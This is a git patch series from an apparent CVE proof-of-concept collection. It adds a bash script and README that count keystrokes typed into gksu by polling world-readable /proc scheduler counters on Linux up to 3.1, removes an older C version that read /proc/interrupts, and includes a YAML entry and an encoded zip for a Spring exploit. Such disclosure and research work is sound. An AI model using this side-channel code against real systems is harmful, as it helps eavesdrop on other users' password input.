if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file From 402b0c217ca604eb0c8317ed5cff6541d99c6fbe Mon Sep 17 00:00:00 2001 
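Review bot: `names` in init_i8042_number is an uninitialised stack array, yet reread_ints only fills `names[i]` when the slot is already NULL, so whatever the slot happened to contain is later handed to `strcmp`; declare it `char *names[1024] = {0};`. The same call passes `sizeof(ints_prev)` (a byte count, 4096) as `int_count`, so the read loop is bounded by four times the 1024-entry arrays it writes into; `sizeof(ints_prev)/sizeof(ints_prev[0])` is the bound the code intends, and the return value of the first header `fgets` is also unchecked. The `#include` lines render empty here, presumably an extraction artefact rather than the committed text. This file is replaced wholesale by a shell script in PATCH 092, so these points only matter if the C version is ever restored.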
From: gzm Date: Tue, 11 Apr 2023 11:53:20 +0000 Subject: [PATCH 091/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/linux-kernel/2011/CVE-2011-4916/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4916/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4916/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4916/.keep b/cve/linux-kernel/2011/CVE-2011-4916/.keep deleted file mode 100644 index e69de29b..00000000 From 8d94d224f4a3ee80dabad5c5206e244fc86d443f Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:58:01 +0000 Subject: [PATCH 092/109] =?UTF-8?q?update=20cve/linux-kernel/2011/CVE-2011?= =?UTF-8?q?-4916/CVE-2011-4916.c.=20=E4=BF=AE=E6=94=B9PoC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 206 +++--------------- 1 file changed, 32 insertions(+), 174 deletions(-) diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c index 949781c2..addc78ce 100644 --- a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c 
@@ -1,178 +1,36 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include +PNAME="$1" +while :; do + PID=`pgrep "$PNAME"` + if [ -n "$PID" ]; then + echo $PID + cd /proc/$PID/ + break + fi + sleep 1 +done -int i8042_number; -int ints[1024], ints_prev[1024], ints_delta[1024]; +S=0.0 +while :; do + V=`grep se.exec_start sched 2>/dev/null | cut -d: -f2-` + [ -z "$V" ] && break + if [ "$V" != "$S" ]; then + VAL=`echo "$V - $S" | bc -l` + VALI=`echo $VAL | cut -d. -f1` + [ -z "$VALI" ] && VALI=0 -char buffer[1024]; + if [ "$VALI" -le 815 -a "$VALI" -ge 785 ]; then + # Cursor appeared + : + elif [ $VALI -le 415 -a $VALI -ge 385 ]; then + # Cursor disappeared + : + elif [ $VALI -ge 150 ]; then + echo "$VAL (KEY PRESSED)" + else + echo "$VAL" + fi -int reread_ints(int *interrupts, int int_count, char **names) -{ - int i; - int n, c1, c2; - char s1[1024], s2[1024]; - - int interrupts_fd; - FILE *interrupts_file; - - interrupts_fd = open("/proc/interrupts", O_RDONLY); - if (interrupts_fd == -1) - err(1, "open(\"/proc/interrupts\")"); - - interrupts_file = fdopen(interrupts_fd, "r"); - if (interrupts_file == NULL) - err(1, "fdopen"); - - if (fseek(interrupts_file, 0, SEEK_SET) < 0) - err(1, "lseek"); - - fgets(buffer, sizeof(buffer), interrupts_file); - - for (i = 0; i < int_count; i++) { - if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { - fclose(interrupts_file); - return i; - } - - if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { - fclose(interrupts_file); - return i; - } - - if (names != NULL && names[i] == NULL) - names[i] = strdup(s2); - - interrupts[i] = c1 + c2; - } - - fclose(interrupts_file); - return int_count; -} - -void init_i8042_number(void) -{ - int i; - int can_be_keyboard[1024]; - char *names[1024]; - int number_of_interrups, can_be_keyboard_numbers; - - number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); - - /* - * Identify the i8042 interrupt associated with the 
keyboard by: - * 1) name should be i8042 - * 2) interrupts count emitted in one second shouldn't be more than 100 - */ - for (i = 0; i < number_of_interrups; i++) - can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; - - while (1) { - sleep(1); - reread_ints(ints, sizeof(ints), NULL); - - can_be_keyboard_numbers = 0; - for (i = 0; i < number_of_interrups; i++) { - can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; - if (can_be_keyboard[i]) - can_be_keyboard_numbers++; - - ints_prev[i] = ints[i]; - } - - if (can_be_keyboard_numbers == 1) { - for (i = 0; i < number_of_interrups; i++) - if (can_be_keyboard[i]) { - i8042_number = i; - printf("i8042 keyboard is #%d\n", i); - return; - } - } - } -} - -int i8042_read(void) -{ - reread_ints(ints, sizeof(ints), NULL); - ints_prev[i8042_number] = ints[i8042_number]; - - return ints[i8042_number]; -} - -int wait_for_program(char *pname) -{ - FILE *f; - int pid; - char s[1024]; - - snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" - " sleep 0.1; done", pname); - system(s); - snprintf(s, sizeof(s), "pgrep %s", pname); - f = popen(s, "r"); - if (f == NULL) - err(1, "popen"); - - if (fgets(buffer, sizeof(buffer), f) == NULL) - err(1, "fgets"); - - if (sscanf(buffer, "%d", &pid) < 1) - err(1, "sscanf"); - - pclose(f); - - return pid; -} - -int main(int argc, char *argv[]) -{ - int n, old, sum, i; - int pid; - char *pname = argv[1]; - - if (argc < 2) - errx(1, "usage: spy-interrupts gksu"); - - puts("Waiting for mouse activity..."); - init_i8042_number(); - - pid = wait_for_program(pname); - printf("%s is %d\n", pname, pid); - - old = i8042_read(); - - sum = 0; - - while (1) { - n = i8042_read(); - if (old == n) - usleep(10000); - else { - for (i = 0; i < n-old; i++) - putchar('.'); - fflush(stdout); - } - - sum += n - old; - old = n; - - if (kill(pid, 0) < 0 && errno == ESRCH) - break; - } - - /* - * #interrupts == 2 * #keystrokes. - * #keystrokes = len(password) - 1 because of ENTER after the password. 
- */ - printf("\n%d keystrokes\n", (sum-2)/2); - - return 0; -} \ No newline at end of file + S=$V + fi +done \ No newline at end of file From 3621620045a525a8881287fa54a581a4f1c6a61e Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:00:48 +0000 Subject: [PATCH 093/109] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-49?= =?UTF-8?q?16/README.md.=20=E6=B7=BB=E5=8A=A0README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- cve/linux-kernel/2011/CVE-2011-4916/README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/README.md diff --git a/cve/linux-kernel/2011/CVE-2011-4916/README.md b/cve/linux-kernel/2011/CVE-2011-4916/README.md new file mode 100644 index 00000000..6ca03d6e --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4916/README.md @@ -0,0 +1,14 @@ +A PoC for spying for keystrokes in gksu in Linux <= 3.1. + +/proc/$PID/{sched,schedstat} are world readable, so we can just loop +on one CPU core while the victim is executed on another, and spy for +the changes of scheduling counters. The PoC counts only keystrokes number, +but it can be easily extended to note the delays between the keystrokes +and do the statistical analysis to learn the input characters. See +e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on +Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang. + +It is NOT stable, it only shows a design flaw (the lack of proper +permission model of procfs debugging counters). The constants are true +for the author's system only and don't take into account other sources of +gksu CPU activity. \ No newline at end of file From c15f3bab81a4a98c7f3cb9b1eaba35ff63142d1d Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:02:42 +0000 Subject: [PATCH 094/109] update cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c. 
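Review bot: The new content is a Bash script but the file keeps the name `CVE-2011-4916.c`, and PATCH 094 adds `#!/bin/bash` without renaming it; moving it to a `.sh` path would stop editors, linters and readers from treating it as C. The `pgrep "$PNAME"` command substitution assigned to PID can return several PIDs, since pgrep matches an unanchored pattern, and the following unquoted `cd /proc/$PID/` then fails with its status ignored, leaving the `grep se.exec_start sched` loop reading relative to whatever the current directory was; take one PID and check the cd, e.g. `PID=$(pgrep "$PNAME" | head -n1)` and `cd "/proc/$PID/" || exit 1`. The `[ … -a … ]` form of the range tests is the obsolete test syntax (and the second branch leaves `$VALI` unquoted while the first quotes it); `[ "$VALI" -le 815 ] && [ "$VALI" -ge 785 ]` is the portable, consistent form.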
Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c index addc78ce..df2656d1 100644 --- a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c @@ -1,3 +1,24 @@ +#!/bin/bash +# +# A PoC for spying for keystrokes in gksu in Linux <= 3.1. +# +# /proc/$PID/{sched,schedstat} are world readable, so we can just loop +# on one CPU core while the victim is executed on another, and spy for +# the changes of scheduling counters. The PoC counts only keystrokes number, +# but it can be easily extended to note the delays between the keystrokes +# and do the statistical analysis to learn the input characters. See +# e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on +# Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang. +# +# It is NOT stable, it only shows a design flaw (the lack of proper +# permission model of procfs debugging counters). The constants are true +# for the author's system only and don't take into account other sources of +# gksu CPU activity. +# +# by segoon from openwall +# +# run as: spy-sched gksu + PNAME="$1" while :; do From bbc50d66efc92dab43284de671465a40e5c5427e Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:06:11 +0000 Subject: [PATCH 095/109] add cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml. Signed-off-by: gzm --- cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml new file mode 100644 index 00000000..2442cf53 --- /dev/null +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml 
@@ -0,0 +1,18 @@ +id: CVE-2011-4916 +source: https://www.openwall.com/lists/oss-security/2011/11/05/3 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4916 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file From 278eb1bf5821b17e0ac39ae8b18aa62e7e326206 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:07:29 +0000 Subject: [PATCH 096/109] update other_list.yaml. Signed-off-by: gzm --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index b5ad0832..8e7bacf1 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -15,6 +15,7 @@ cve: - CVE-2023-0179 - CVE-2018-18955 - CVE-2011-4917 + - CVE-2011-4916 polkit: - CVE-2021-3560 Outlook: From 7c80dc0349cc10bda5e63fef116cca5524d649e8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:53:44 +0000 Subject: [PATCH 097/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202017?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/.keep diff --git a/cve/java-spring/2017/.keep b/cve/java-spring/2017/.keep new file mode 100644 index 00000000..e69de29b From 4b6f0f8165d95fa97545a16cc00b8f20cc604b67 Mon Sep 17 00:00:00 2001 
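Review bot: The `description` attributes the keystroke leak to access to /dev/pts/ and /dev/tty*, but the PoC committed next to it (PATCH 092/094) and the openwall post given as `source` both describe reading the world-readable scheduler counters in /proc/$PID/sched and schedstat, so the entry does not match its own PoC. If the sentence was copied from an aggregator, add a clause stating that the included PoC relies on the procfs scheduling counters rather than the tty devices, so a reader who opens the script is not left reconciling the two. The `cwe-id`, CVSS vector and affected range are consistent with the README in PATCH 093 and need no change.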
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:54:28 +0000 Subject: [PATCH 098/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2017-8046?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/CVE-2017-8046/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/CVE-2017-8046/.keep diff --git a/cve/java-spring/2017/CVE-2017-8046/.keep b/cve/java-spring/2017/CVE-2017-8046/.keep new file mode 100644 index 00000000..e69de29b From 0e1a29412964d1db7fd4310a2c2864d53a5e4849 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:56:14 +0000 Subject: [PATCH 099/109] add cve-2017-8046 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- .../spring-break_cve-2017-8046-master.zip | Bin 0 -> 12833 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip 
diff --git a/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip b/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip new file mode 100644 index 0000000000000000000000000000000000000000..078e924350cf580703b34d31477354a894198a3b GIT binary patch literal 12833 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 